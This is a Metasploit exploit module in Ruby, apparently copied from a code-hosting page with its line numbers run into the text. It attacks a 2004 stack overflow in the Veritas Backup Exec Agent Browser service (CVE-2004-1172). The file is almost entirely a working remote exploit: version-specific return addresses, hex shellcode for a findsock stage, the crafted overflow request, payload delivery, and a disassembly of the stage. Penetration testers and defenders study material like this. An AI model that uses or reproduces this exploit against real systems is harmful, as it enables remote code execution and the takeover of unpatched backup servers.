Path: blob/master/modules/exploits/windows/backupexec/name_service.rb
19612 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = AverageRanking78include Msf::Exploit::Remote::Tcp910def initialize(info = {})11super(12update_info(13info,14'Name' => 'Veritas Backup Exec Name Service Overflow',15'Description' => %q{16This module exploits a vulnerability in the Veritas Backup17Exec Agent Browser service. This vulnerability occurs when a18recv() call has a length value too long for the destination19stack buffer. By sending an agent name value of 63 bytes or20more, we can overwrite the return address of the recv21function. Since we only have ~60 bytes of contiguous space22for shellcode, a tiny findsock payload is sent which uses a23hardcoded IAT address for the recv() function. This payload24will then roll the stack back to the beginning of the page,25recv() the real shellcode into it, and jump to it. This26module has been tested against Veritas 9.1 SP0, 9.1 SP1, and278.6.28},29'Author' => [ 'hdm' ],30'License' => MSF_LICENSE,31'References' => [32[ 'CVE', '2004-1172'],33[ 'OSVDB', '12418'],34[ 'BID', '11974'],35[ 'URL', 'http://www.idefense.com/application/poi/display?id=169&type=vulnerabilities'],36],37'Privileged' => true,38'Payload' => {39'Space' => 1024,40'MinNops' => 512,41'StackAdjustment' => -3500,42},43'Platform' => %w{win},44'Targets' => [45[46'Veritas BE 9.1 SP0/SP1', # BackupExec 9.1 SP0/SP1 return contributed by class10147{48'Platform' => 'win',49'Rets' => [ 0x0142ffa1, 0x401150FF ], # [email protected] v9.1.4691.0 | [email protected]50},51],52[53'Veritas BE 8.5',54{55'Platform' => 'win',56'Rets' => [ 0x014308b9, 0x401138FF ], # [email protected] v8.50.3572 | [email protected] v8.50.357257},58],59],60'DisclosureDate' => '2004-12-16',61'DefaultTarget' => 0,62'Notes' => {63'Reliability' => UNKNOWN_RELIABILITY,64'Stability' => UNKNOWN_STABILITY,65'SideEffects' => UNKNOWN_SIDE_EFFECTS66}67)68)6970register_options(71[72Opt::RPORT(6101)73]74)75end7677def exploit78connect7980print_status("Trying target #{target.name}...")8182# This will findsock/read the real shellcode (51 bytes, harcoded IAT for recv)83# The IAT for recv() is for bnetns, the address is shifted by 8 bits to avoid84# nulls: [0x00401150 -> 0x401150FF]85stage_code = "\xfc" * 11286stage_read =87"\x31\xf6\xc1\xec\x0c\xc1\xe4\x0c\x89\xe7\x89\xfb\x6a\x01\x8b\x74" +88"\x24\xfe\x31\xd2\x52\x42\xc1\xe2\x10\x52\x57\x56\xb8\xff\x50\x11" +89"\x40\xc1\xe8\x08\xff\x10\x85\xc0\x79\x07\x89\xdc\x4e\x85\xf6\x75"9091# Configure the IAT for the recv call92stage_read[29, 4] = [ target['Rets'][1] ].pack('V')9394# Stuff it all into one request95stage_code[2, stage_read.length] = stage_read9697# Create the registration request98req =99"\x02\x00\x32\x00\x20\x00" + stage_code + "\x00" +100"1.1.1.1.1.1\x00" + "\xeb\x81"101102print_status("Sending the agent registration request of #{req.length} bytes...")103sock.put(req)104105print_status("Sending the payload stage down the socket...")106sock.put(payload.encoded)107108print_status("Waiting for the payload to execute...")109select(nil, nil, nil, 2)110111handler112disconnect113end114end115116117__END__118[ findsock stage ]11900000000 31F6 xor esi,esi12000000002 C1EC0C shr esp,0xc12100000005 C1E40C shl esp,0xc12200000008 89E7 mov edi,esp1230000000A 89FB mov ebx,edi1240000000C 6A01 push byte +0x11250000000E 8B7424FE mov esi,[esp-0x2]12600000012 31D2 xor edx,edx12700000014 52 push edx12800000015 42 inc edx12900000016 C1E210 shl edx,0x1013000000019 52 push edx1310000001A 57 push edi1320000001B 56 push esi1330000001C B8FF501140 mov eax,0x401150ff13400000021 C1E808 shr eax,0x813500000024 FF10 call near [eax]13600000026 85C0 test eax,eax13700000028 7907 jns 0x311380000002A 89DC mov esp,ebx1390000002C 4E dec esi1400000002D 85F6 test esi,esi1410000002F 75E1 jnz 0x1214200000031 FFD7 call edi143144145